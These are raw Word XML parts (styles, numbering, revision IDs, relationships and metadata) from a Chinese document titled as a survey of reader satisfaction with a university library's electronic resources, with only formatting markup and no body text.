        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t>6</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="25"/>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
        <w:kern w:val="0"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>
      </w:rPr>
      <w:t xml:space="preserve"> 页</w:t>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="14"/>
      <w:ind w:left="210" w:right="360" w:firstLine="1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210" w:firstLine="210"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p>
      <w:pPr>
        <w:ind w:left="210" w:firstLine="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left="210" w:firstLine="1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ind w:left="210" w:firstLine="1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left="210" w:firstLine="21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left="210" w:firstLine="21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left="210" w:firstLine="2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1DB4D4"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="BC1DB4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696533F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0696533F"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="612"/>
        </w:tabs>
        <w:ind w:left="612" w:hanging="432"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1.%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="756"/>
        </w:tabs>
        <w:ind w:left="756" w:hanging="576"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="4"/>
      <w:lvlText w:val="2.1.%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1260"/>
        </w:tabs>
        <w:ind w:left="900" w:hanging="720"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体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044"/>
        </w:tabs>
        <w:ind w:left="104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188"/>
        </w:tabs>
        <w:ind w:left="118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332"/>
        </w:tabs>
        <w:ind w:left="133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476"/>
        </w:tabs>
        <w:ind w:left="147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620"/>
        </w:tabs>
        <w:ind w:left="162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764"/>
        </w:tabs>
        <w:ind w:left="1764" w:hanging="1584"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="16196AEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="16196AEB"/>
    <w:lvl w:ilvl="0" w:tentative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1001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2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23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64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4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486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767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408" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="316643BC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="316643BC"/>
    <w:lvl w:ilvl="0" w:tentative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001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2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23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64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05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846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127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768" w:hanging="2520"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4">
    <w:nsid w:val="5A9A0875"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5A9A0875"/>
    <w:lvl w:ilvl="0" w:tentative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1001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2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23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64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4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486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767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408" w:hanging="2160"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="76B00E20"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76B00E20"/>
    <w:lvl w:ilvl="0" w:tentative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001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2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23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64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05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846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127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768" w:hanging="25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</w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00433951"/>
    <w:rsid w:val="00002FF8"/>
    <w:rsid w:val="00021F98"/>
    <w:rsid w:val="00027D72"/>
    <w:rsid w:val="00030DA0"/>
    <w:rsid w:val="000365FA"/>
    <w:rsid w:val="00044166"/>
    <w:rsid w:val="00071EBD"/>
    <w:rsid w:val="000770D9"/>
    <w:rsid w:val="000B6D81"/>
    <w:rsid w:val="000C42C8"/>
    <w:rsid w:val="000D0F84"/>
    <w:rsid w:val="000D658A"/>
    <w:rsid w:val="000D71F6"/>
    <w:rsid w:val="000D72EF"/>
    <w:rsid w:val="00103409"/>
    <w:rsid w:val="00113F32"/>
    <w:rsid w:val="00121D16"/>
    <w:rsid w:val="00127F99"/>
    <w:rsid w:val="001323F4"/>
    <w:rsid w:val="00136167"/>
    <w:rsid w:val="00145AB0"/>
    <w:rsid w:val="00150BE4"/>
    <w:rsid w:val="001931CF"/>
    <w:rsid w:val="001B0C72"/>
    <w:rsid w:val="001B3357"/>
    <w:rsid w:val="001C1136"/>
    <w:rsid w:val="001D077B"/>
    <w:rsid w:val="001E2BD5"/>
    <w:rsid w:val="00216304"/>
    <w:rsid w:val="002340B8"/>
    <w:rsid w:val="0026575F"/>
    <w:rsid w:val="00267A52"/>
    <w:rsid w:val="00272C89"/>
    <w:rsid w:val="002839EB"/>
    <w:rsid w:val="00291BA4"/>
    <w:rsid w:val="002B0B45"/>
    <w:rsid w:val="002C27C4"/>
    <w:rsid w:val="002C41F5"/>
    <w:rsid w:val="002C51FE"/>
    <w:rsid w:val="002D798F"/>
    <w:rsid w:val="002E5476"/>
    <w:rsid w:val="002F0D83"/>
    <w:rsid w:val="002F36C7"/>
    <w:rsid w:val="00322D25"/>
    <w:rsid w:val="003354E4"/>
    <w:rsid w:val="00356DA7"/>
    <w:rsid w:val="00383723"/>
    <w:rsid w:val="003867E2"/>
    <w:rsid w:val="003B2308"/>
    <w:rsid w:val="003B69A8"/>
    <w:rsid w:val="003D5E63"/>
    <w:rsid w:val="003D73AA"/>
    <w:rsid w:val="003E0D85"/>
    <w:rsid w:val="003E4857"/>
    <w:rsid w:val="003F0890"/>
    <w:rsid w:val="003F0DE3"/>
    <w:rsid w:val="003F32FD"/>
    <w:rsid w:val="00404385"/>
    <w:rsid w:val="00404AFC"/>
    <w:rsid w:val="00417B39"/>
    <w:rsid w:val="00433951"/>
    <w:rsid w:val="00435AD0"/>
    <w:rsid w:val="00446110"/>
    <w:rsid w:val="004616DC"/>
    <w:rsid w:val="00465C8D"/>
    <w:rsid w:val="00493604"/>
    <w:rsid w:val="004B3C8A"/>
    <w:rsid w:val="004C289A"/>
    <w:rsid w:val="004E0F72"/>
    <w:rsid w:val="004E4549"/>
    <w:rsid w:val="00523FA4"/>
    <w:rsid w:val="0053135C"/>
    <w:rsid w:val="005376F3"/>
    <w:rsid w:val="005413CF"/>
    <w:rsid w:val="005660D6"/>
    <w:rsid w:val="00580E68"/>
    <w:rsid w:val="0058116E"/>
    <w:rsid w:val="005B0328"/>
    <w:rsid w:val="005C467C"/>
    <w:rsid w:val="005D0D78"/>
    <w:rsid w:val="005E3FFA"/>
    <w:rsid w:val="005F2786"/>
    <w:rsid w:val="005F3337"/>
    <w:rsid w:val="005F5A29"/>
    <w:rsid w:val="00605FFC"/>
    <w:rsid w:val="006060E9"/>
    <w:rsid w:val="00630EAE"/>
    <w:rsid w:val="006414D4"/>
    <w:rsid w:val="00687FF3"/>
    <w:rsid w:val="006B5E69"/>
    <w:rsid w:val="006B6245"/>
    <w:rsid w:val="006C564E"/>
    <w:rsid w:val="006D0E9A"/>
    <w:rsid w:val="006E40CD"/>
    <w:rsid w:val="006F0FE4"/>
    <w:rsid w:val="006F78BD"/>
    <w:rsid w:val="00703DC7"/>
    <w:rsid w:val="00717C85"/>
    <w:rsid w:val="00735F8D"/>
    <w:rsid w:val="00740C6E"/>
    <w:rsid w:val="00744433"/>
    <w:rsid w:val="007634BF"/>
    <w:rsid w:val="007635D4"/>
    <w:rsid w:val="00763CDC"/>
    <w:rsid w:val="00783963"/>
    <w:rsid w:val="00785660"/>
    <w:rsid w:val="00791CD9"/>
    <w:rsid w:val="007923EE"/>
    <w:rsid w:val="007C0B97"/>
    <w:rsid w:val="007D574B"/>
    <w:rsid w:val="007F0488"/>
    <w:rsid w:val="007F1740"/>
    <w:rsid w:val="007F465F"/>
    <w:rsid w:val="007F5F10"/>
    <w:rsid w:val="00830B82"/>
    <w:rsid w:val="0084483F"/>
    <w:rsid w:val="00844AF4"/>
    <w:rsid w:val="00851AF7"/>
    <w:rsid w:val="008709DF"/>
    <w:rsid w:val="00887A84"/>
    <w:rsid w:val="00897B1C"/>
    <w:rsid w:val="008A70D8"/>
    <w:rsid w:val="008C64B0"/>
    <w:rsid w:val="008C7B55"/>
    <w:rsid w:val="008E4A18"/>
    <w:rsid w:val="009019F1"/>
    <w:rsid w:val="009048E2"/>
    <w:rsid w:val="00904E97"/>
    <w:rsid w:val="0091745D"/>
    <w:rsid w:val="0092117A"/>
    <w:rsid w:val="00926219"/>
    <w:rsid w:val="00933C4A"/>
    <w:rsid w:val="009400B0"/>
    <w:rsid w:val="00945A3A"/>
    <w:rsid w:val="00977227"/>
    <w:rsid w:val="009840B8"/>
    <w:rsid w:val="00990D22"/>
    <w:rsid w:val="0099261A"/>
    <w:rsid w:val="009A2C22"/>
    <w:rsid w:val="009A3D66"/>
    <w:rsid w:val="009A7300"/>
    <w:rsid w:val="009B3707"/>
    <w:rsid w:val="009C4793"/>
    <w:rsid w:val="009D05AB"/>
    <w:rsid w:val="009D5C29"/>
    <w:rsid w:val="009E4D5B"/>
    <w:rsid w:val="00A243FB"/>
    <w:rsid w:val="00A27EDB"/>
    <w:rsid w:val="00A40A0F"/>
    <w:rsid w:val="00A43212"/>
    <w:rsid w:val="00A46D6E"/>
    <w:rsid w:val="00A6065E"/>
    <w:rsid w:val="00A6512C"/>
    <w:rsid w:val="00A90E48"/>
    <w:rsid w:val="00A9609E"/>
    <w:rsid w:val="00A96853"/>
    <w:rsid w:val="00AA0B52"/>
    <w:rsid w:val="00AA2234"/>
    <w:rsid w:val="00AB3400"/>
    <w:rsid w:val="00AC45B0"/>
    <w:rsid w:val="00AD2C84"/>
    <w:rsid w:val="00AF79BC"/>
    <w:rsid w:val="00B03BE7"/>
    <w:rsid w:val="00B07445"/>
    <w:rsid w:val="00B208B5"/>
    <w:rsid w:val="00B31B52"/>
    <w:rsid w:val="00B478C1"/>
    <w:rsid w:val="00B504CB"/>
    <w:rsid w:val="00B5721B"/>
    <w:rsid w:val="00B74133"/>
    <w:rsid w:val="00B7589C"/>
    <w:rsid w:val="00B809D3"/>
    <w:rsid w:val="00B91DEF"/>
    <w:rsid w:val="00BA5C22"/>
    <w:rsid w:val="00BD217D"/>
    <w:rsid w:val="00BD6073"/>
    <w:rsid w:val="00BE0F3A"/>
    <w:rsid w:val="00C13E6B"/>
    <w:rsid w:val="00C14BFC"/>
    <w:rsid w:val="00C157D6"/>
    <w:rsid w:val="00C27A90"/>
    <w:rsid w:val="00C323B9"/>
    <w:rsid w:val="00C612C3"/>
    <w:rsid w:val="00C72D89"/>
    <w:rsid w:val="00CB5922"/>
    <w:rsid w:val="00CC18FF"/>
    <w:rsid w:val="00CC35AE"/>
    <w:rsid w:val="00CC3891"/>
    <w:rsid w:val="00CC5EA1"/>
    <w:rsid w:val="00CD3368"/>
    <w:rsid w:val="00CF3DF4"/>
    <w:rsid w:val="00CF4221"/>
    <w:rsid w:val="00D059E8"/>
    <w:rsid w:val="00D12E6C"/>
    <w:rsid w:val="00D14186"/>
    <w:rsid w:val="00D3761E"/>
    <w:rsid w:val="00D45470"/>
    <w:rsid w:val="00D57938"/>
    <w:rsid w:val="00D73898"/>
    <w:rsid w:val="00D80247"/>
    <w:rsid w:val="00D91A59"/>
    <w:rsid w:val="00D94895"/>
    <w:rsid w:val="00DC1FA0"/>
    <w:rsid w:val="00DD52A2"/>
    <w:rsid w:val="00DD53BE"/>
    <w:rsid w:val="00DD764B"/>
    <w:rsid w:val="00DE1995"/>
    <w:rsid w:val="00DF2463"/>
    <w:rsid w:val="00E00C06"/>
    <w:rsid w:val="00E01D8A"/>
    <w:rsid w:val="00E145A1"/>
    <w:rsid w:val="00E17BB8"/>
    <w:rsid w:val="00E50348"/>
    <w:rsid w:val="00E85038"/>
    <w:rsid w:val="00E91D4F"/>
    <w:rsid w:val="00E97C36"/>
    <w:rsid w:val="00EA6206"/>
    <w:rsid w:val="00EC328E"/>
    <w:rsid w:val="00F02EFA"/>
    <w:rsid w:val="00F06EB1"/>
    <w:rsid w:val="00F17472"/>
    <w:rsid w:val="00F20459"/>
    <w:rsid w:val="00F26AE0"/>
    <w:rsid w:val="00F37780"/>
    <w:rsid w:val="00F44C26"/>
    <w:rsid w:val="00F606A1"/>
    <w:rsid w:val="00F67DA3"/>
    <w:rsid w:val="00F95C6F"/>
    <w:rsid w:val="00F96799"/>
    <w:rsid w:val="00FB1DFB"/>
    <w:rsid w:val="00FB63E3"/>
    <w:rsid w:val="00FC65A8"/>
    <w:rsid w:val="00FE4DCC"/>
    <w:rsid w:val="03B90390"/>
    <w:rsid w:val="05EC0902"/>
    <w:rsid w:val="06622973"/>
    <w:rsid w:val="06CC5B3F"/>
    <w:rsid w:val="09AA1703"/>
    <w:rsid w:val="0B167690"/>
    <w:rsid w:val="0C2B3ED1"/>
    <w:rsid w:val="0E1F65D3"/>
    <w:rsid w:val="10910397"/>
    <w:rsid w:val="10C417B4"/>
    <w:rsid w:val="13C44C6D"/>
    <w:rsid w:val="183F2B14"/>
    <w:rsid w:val="1DED3012"/>
    <w:rsid w:val="1FFF0585"/>
    <w:rsid w:val="212F41BF"/>
    <w:rsid w:val="25273672"/>
    <w:rsid w:val="26061B8D"/>
    <w:rsid w:val="286A0077"/>
    <w:rsid w:val="28DA4193"/>
    <w:rsid w:val="29C02312"/>
    <w:rsid w:val="2B330D0F"/>
    <w:rsid w:val="2BE5357A"/>
    <w:rsid w:val="2D4D0267"/>
    <w:rsid w:val="31AE4E5F"/>
    <w:rsid w:val="334B460B"/>
    <w:rsid w:val="363C5FCD"/>
    <w:rsid w:val="398A4394"/>
    <w:rsid w:val="3AE96BE3"/>
    <w:rsid w:val="3DB177F5"/>
    <w:rsid w:val="3FC24586"/>
    <w:rsid w:val="42332945"/>
    <w:rsid w:val="431E017C"/>
    <w:rsid w:val="43A60777"/>
    <w:rsid w:val="46162856"/>
    <w:rsid w:val="4CEA6032"/>
    <w:rsid w:val="4D6F5C57"/>
    <w:rsid w:val="508C766D"/>
    <w:rsid w:val="52E02222"/>
    <w:rsid w:val="58AE44DE"/>
    <w:rsid w:val="5D1A0A26"/>
    <w:rsid w:val="65167D25"/>
    <w:rsid w:val="69A23C33"/>
    <w:rsid w:val="6B376C47"/>
    <w:rsid w:val="74C23A26"/>
    <w:rsid w:val="781976DF"/>
    <w:rsid w:val="7E2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left="100" w:leftChars="100" w:firstLine="100" w:firstLineChars="1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ordWrap w:val="0"/>
      <w:ind w:left="210" w:firstLine="301"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:sz w:val="30"/>
      <w:szCs w:val="30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wordWrap w:val="0"/>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:left="1001" w:leftChars="0" w:hanging="720" w:firstLineChars="0"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b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3">
    <w:name w:val="Default Paragraph Font"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semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="000080"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="1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  <w:pPr>
      <w:ind w:left="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17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8">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:unhideWhenUsed/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="42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1">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="12"/>
    <w:next w:val="12"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="24">
    <w:name w:val="Strong"/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="25">
    <w:name w:val="page number"/>
    <w:basedOn w:val="23"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="26">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="23"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="000066"/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="27">
    <w:name w:val="HTML Code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8">
    <w:name w:val="annotation reference"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="29">
    <w:name w:val="footnote reference"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="30">
    <w:name w:val="style2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1">
    <w:name w:val="目录 11"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1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customStyle="1" w:styleId="32">
    <w:name w:val="目录 21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customStyle="1" w:styleId="33">
    <w:name w:val="目录 31"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1260"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8280"/>
      </w:tabs>
      <w:spacing w:line="400" w:lineRule="exact"/>
      <w:ind w:left="420"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:iCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="34">
    <w:name w:val="标题4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="35">
    <w:name w:val="样式1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="6"/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="1440"/>
      </w:tabs>
      <w:ind w:right="206" w:rightChars="98"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="36">
    <w:name w:val="样式1 Char"/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="2"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="37">
    <w:name w:val="目录 41"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="630"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="38">
    <w:name w:val="目录 51"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="840"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="39">
    <w:name w:val="目录 61"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1050"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="40">
    <w:name w:val="目录 71"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1260"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="41">
    <w:name w:val="目录 81"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1470"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="42">
    <w:name w:val="目录 91"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:left="1680"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="43">
    <w:name w:val="Unresolved Mention"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="44">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:ind w:left="0" w:leftChars="0" w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="等线" w:hAnsi="等线" w:eastAsia="等线"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="45">
    <w:name w:val="_Style 2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46">
    <w:name w:val="_Style 3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6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../customXml/item1.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId59" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://192.168.31.195:6123/login.php" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34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image" Target="../NULL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image" Target="media/image25.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml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9A58-5CDC-45EB-989F-16AE9878AB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cuit</Company>
  <Pages>23</Pages>
  <Words>2678</Words>
  <Characters>4537</Characters>
  <Lines>33</Lines>
  <Paragraphs>9</Paragraphs>
  <TotalTime>63</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5208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2024-07-08T14:03:00Z</dcterms:created>
  <dc:creator>hb</dc:creator>
  <cp:lastModifiedBy>穆意</cp:lastModifiedBy>
  <cp:lastPrinted>2007-05-14T07:48:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-01T14:56:17Z</dcterms:modified>
  <dc:title>高校图书馆电子资源建设读者满意度调查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KSOTemplateDocerSaveRecord">
    <vt:lpwstr>eyJoZGlkIjoiM2UzZDliNGVlYzIxNmQ3MWY4NjdmMGIwZjk4ZmQ2NjUiLCJ1c2VySWQiOiIxMjM0MzA0MzMwIn0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>25F48FCBA4D446628CA21213FBB00FDC_13</vt:lpwstr>
  </property>
</Properties>
</file>